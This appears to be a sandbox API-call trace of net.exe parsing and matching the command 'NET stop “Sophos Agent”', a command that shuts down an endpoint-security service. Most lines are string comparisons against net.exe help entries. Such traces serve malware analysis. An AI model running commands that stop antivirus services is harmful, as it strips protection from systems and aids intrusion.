_Context=0x3d6) returned="\r\n" [0210.547] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.547] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0210.547] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0210.547] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.547] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0210.547] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.547] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0210.547] wcscpy_s (in: _Destination=0x57a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0210.547] LoadLibraryW (lpLibFileName="NETMSG") returned 0x749f0000 [0210.548] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x749f0000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x57b338, nSize=0x800, Arguments=0x579dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0210.549] GetFileType (hFile=0x26c) returned 0x3 [0210.549] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x6841b8 [0210.549] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x6841b8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0210.549] WriteFile (in: hFile=0x26c, lpBuffer=0x6841b8, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ef9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef9e0, lpOverlapped=0x0) returned 0 [0210.549] LocalFree (hMem=0x6841b8) returned 0x0 [0210.549] GetFileType (hFile=0x26c) returned 0x3 [0210.549] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x683d48 [0210.549] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x683d48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nh", lpUsedDefaultChar=0x0) returned 2 [0210.549] WriteFile (in: hFile=0x26c, lpBuffer=0x683d48, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ef9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef9e0, lpOverlapped=0x0) returned 0 [0210.549] LocalFree (hMem=0x683d48) returned 0x0 [0210.549] wcscpy_s (in: _Destination=0x2efa98, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0210.549] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0210.549] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0210.549] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0210.549] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0210.549] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0210.549] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="AgentΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos AgentΓÇ¥") returned 0x0 [0210.549] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h댸W宅.ѰWɬ") returned 0xad [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF", _MaxCount=0x1b) returned 18 [0210.550] LocalFree (hMem=0x685820) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x2e [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET COMPUTER\r\n\\\\computernam", _MaxCount=0x1b) returned 16 [0210.550] LocalFree (hMem=0x683f30) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0x7d [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODI", _MaxCount=0x1b) returned 16 [0210.550] LocalFree (hMem=0x685820) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x26 [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKS", _MaxCount=0x1b) returned 16 [0210.550] LocalFree (hMem=0x683f30) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x19 [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 16 [0210.550] LocalFree (hMem=0x683f30) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x1b [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1b) returned 13 [0210.550] LocalFree (hMem=0x683f30) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0xbe [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET GROUP\r\n[groupname [/COM", _MaxCount=0x1b) returned 12 [0210.550] LocalFree (hMem=0x685820) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x33 [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or", _MaxCount=0x1b) returned 11 [0210.550] LocalFree (hMem=0x683f30) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x19 [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1b) returned 11 [0210.550] LocalFree (hMem=0x683f30) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0xc1 [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname ", _MaxCount=0x1b) returned 7 [0210.550] LocalFree (hMem=0x685820) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x16 [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 3 [0210.550] LocalFree (hMem=0x683f30) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x33 [0210.550] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET SESSION\r\n[\\\\computernam", _MaxCount=0x1b) returned 15 [0210.550] LocalFree (hMem=0x683f30) returned 0x0 [0210.550] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0x234 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1b) returned 12 [0210.551] LocalFree (hMem=0x685820) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x13 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x1b) returned 14 [0210.551] LocalFree (hMem=0x683f30) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1b) returned 14 [0210.551] LocalFree (hMem=0x683f30) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1b) returned 14 [0210.551] LocalFree (hMem=0x683f30) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x1b) returned 14 [0210.551] LocalFree (hMem=0x683f30) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x1b) returned 14 [0210.551] LocalFree (hMem=0x683f30) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x16 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1b) returned 14 [0210.551] LocalFree (hMem=0x683f30) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x11 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x1b) returned 14 [0210.551] LocalFree (hMem=0x683f30) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.551] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1b) returned 14 [0210.551] LocalFree (hMem=0x683f30) returned 0x0 [0210.551] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x12 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x1b) returned 14 [0210.552] LocalFree (hMem=0x683f30) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0xf [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x1b) returned 14 [0210.552] LocalFree (hMem=0x683f30) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x17 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1b) returned 14 [0210.552] LocalFree (hMem=0x683f30) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x18 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1b) returned 14 [0210.552] LocalFree (hMem=0x683f30) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x2a [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATIO", _MaxCount=0x1b) returned 14 [0210.552] LocalFree (hMem=0x683f30) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 19 [0210.552] LocalFree (hMem=0x683f30) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0x58 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername", _MaxCount=0x1b) returned -1 [0210.552] LocalFree (hMem=0x685820) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x184 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET USE\r\n[devicename | *] [", _MaxCount=0x1b) returned -2 [0210.552] LocalFree (hMem=0x685820) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0xc7 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET USER\r\n[username [passwo", _MaxCount=0x1b) returned -2 [0210.552] LocalFree (hMem=0x685820) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x47 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [", _MaxCount=0x1b) returned -3 [0210.552] LocalFree (hMem=0x685820) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0xc2 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPU", _MaxCount=0x1b) returned 19 [0210.552] LocalFree (hMem=0x685820) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x319 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="SERVICES\r\nNET START can be ", _MaxCount=0x1b) returned -5 [0210.552] LocalFree (hMem=0x685820) returned 0x0 [0210.552] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x483 [0210.552] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="SYNTAX\r\nThe following conve", _MaxCount=0x1b) returned -5 [0210.553] LocalFree (hMem=0x685820) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0xa86 [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="NAMES\r\nThe following types ", _MaxCount=0x1b) returned 4 [0210.553] LocalFree (hMem=0x685820) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x54 [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AgentΓÇ¥", _String2="\r\nFor more information on t", _MaxCount=0x1b) returned 97 [0210.553] LocalFree (hMem=0x685820) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0xad [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0210.553] LocalFree (hMem=0x685820) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x2e [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0210.553] LocalFree (hMem=0x683f30) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0x7d [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0210.553] LocalFree (hMem=0x685820) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x26 [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0210.553] LocalFree (hMem=0x683f30) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x19 [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0210.553] LocalFree (hMem=0x683f30) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x1b [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0210.553] LocalFree (hMem=0x683f30) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0xbe [0210.553] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0210.553] LocalFree (hMem=0x685820) returned 0x0 [0210.553] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x33 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x19 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0xc1 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0210.554] LocalFree (hMem=0x685820) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x16 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x33 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0x234 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0210.554] LocalFree (hMem=0x685820) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x13 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0210.554] 